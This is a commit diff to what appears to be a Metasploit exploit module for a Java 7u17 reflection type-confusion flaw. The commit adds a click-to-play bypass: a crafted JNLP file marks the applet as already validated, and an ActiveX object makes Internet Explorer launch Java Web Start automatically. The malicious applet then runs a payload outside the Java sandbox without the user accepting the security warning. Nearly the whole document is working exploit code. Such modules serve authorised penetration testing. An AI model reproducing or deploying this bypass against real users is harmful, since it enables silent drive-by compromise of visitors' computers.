Add bypass for click2play

modules/exploits/multi/browser/java_jre17_reflection_types.rb

@@ -25,8 +25,9 @@ class Metasploit3 < Msf::Exploit::Remote
 					This module abuses Java Reflection to generate a Type Confusion, due to a weak
 				access control when setting final fields on static classes, and run code outside of
 				the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This
-				exploit doesn't bypass click-to-play, so the user must accept the java warning in
-				order to run the malicious applet.
+				exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is
+				applied mainly to IE, when Java Web Start can be launched automatically throw the
+				ActiveX control. Otherwise the applet is launched without click-to-play bypass.
 			},
 			'License'       => MSF_LICENSE,
 			'Author'        =>
@@ -41,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'BID', '59162' ],
 					[ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ],
 					[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html' ],
-					[ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/b453d9be6b3f' ]
+					[ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/b453d9be6b3f' ],
+					[ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ]
 				],
 			'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
 			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
@@ -90,13 +92,43 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		@exploit_class_name = rand_text_alpha("Exploit".length)
 		@exploit_class.gsub!("Exploit", @exploit_class_name)
+
+		@jnlp_uri  = ((datastore['SSL']) ? "https://" : "http://")
+		@jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+		@jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(8)}.jnlp"
+
 		super
 	end
 
+	def jnlp_file
+		%Q|
+<?xml version="1.0" encoding="utf-8"?>
+<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{@jnlp_uri}">
+	<information>
+		<title>Applet Test JNLP</title>
+		<vendor>#{rand_text_alpha(8)}</vendor>
+		<description>#{rand_text_alpha(8)}</description>
+		<offline-allowed/>
+	</information>
+
+	<resources>
+		<j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />
+		<jar href="#{rand_text_alpha(8)}.jar" main="true" />
+	</resources>
+	<applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">
+		<param name="__applet_ssv_validated" value="true"></param>
+	</applet-desc>
+	<update check="background"/>
+</jnlp>
+		|
+	end
+
 	def on_request_uri(cli, request)
 		print_status("handling request for #{request.uri}")
 
 		case request.uri
+		when /\.jnlp$/i
+			send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" })
 		when /\.jar$/i
 			jar = payload.encoded_jar
 			jar.add_file("#{@exploit_class_name}.class", @exploit_class)
@@ -129,10 +161,17 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def generate_html
-		html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
-		html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
-		html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
-		html += %Q|</applet></body></html>|
+		html = %Q|
+		<html>
+		<body>
+		<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
+		<param name="app" value="#{@jnlp_uri}">
+		<param name="back" value="true">
+		<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
+		</object>
+		</body>
+		</html>
+		|
 		return html
 	end